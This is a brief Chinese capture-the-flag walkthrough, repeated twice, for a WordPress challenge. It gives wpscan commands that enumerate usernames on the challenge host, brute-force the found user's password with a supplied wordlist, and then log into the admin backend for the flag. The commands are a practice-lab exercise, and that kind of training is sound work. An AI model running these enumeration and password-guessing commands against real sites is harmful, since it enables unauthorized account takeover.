解题准备:本题需要使用wpsan,kali自带
解题思路:
1、kali --> wpscan-->破解用户名
wpscan --url http://whalwl.icu:8090/ --enumerate u
2、拿到爆出的用户名,使用本题提供的字典爆密码,即可拿到后台账号密码
wpscan --url http://whalwl.icu:8090/ -U whalwlweb -P /root/dict.txt
3、有了用户名和密码,即可登录后台拿到flag
解题准备:本题需要使用wpsan,kali自带
解题思路:
1、kali --> wpscan-->破解用户名
wpscan --url http://whalwl.icu:8090/ --enumerate u
2、拿到爆出的用户名,使用本题提供的字典爆密码,即可拿到后台账号密码
wpscan --url http://whalwl.icu:8090/ -U whalwlweb -P /root/dict.txt
3、有了用户名和密码,即可登录后台拿到flag